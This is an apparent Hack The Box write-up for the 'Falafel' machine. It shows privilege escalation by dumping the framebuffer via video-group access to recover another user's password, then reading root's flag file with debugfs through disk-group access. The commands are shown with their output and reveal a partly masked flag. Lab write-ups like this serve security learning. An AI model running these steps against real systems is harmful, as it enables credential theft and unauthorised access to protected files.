HTB Falafel privilege escalation writeup
User moshe is in the video group:
$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
The framebuffer device (/dev/fb0) belongs to the video group:
$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0
Dump the framebuffer:
$ cat /dev/fb0 > .ayamkambing
Transfer the dump to your machine and find a way to convert the raw framebuffer to an image.
I use this: fb2png
That tool only takes /dev/fb0 as input, so I copied the dump to my own framebuffer first:
[[email protected] ~]$ cat ../.ayamkambing > /dev/fb0
[[email protected] ~]$ ./fb2png
You’ll get a screenshot of the current screen, and user yossi’s password is shown. Use su
to switch to user yossi (or SSH as yossi):
$ su - yossi
Password:
[email protected]:~$
Yossi is in the disk group:
[email protected]:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
Initially I tried to dump the whole of /dev/sda1 but was greeted with a disk-full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run commands on a raw disk:
[email protected]:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1
Yay!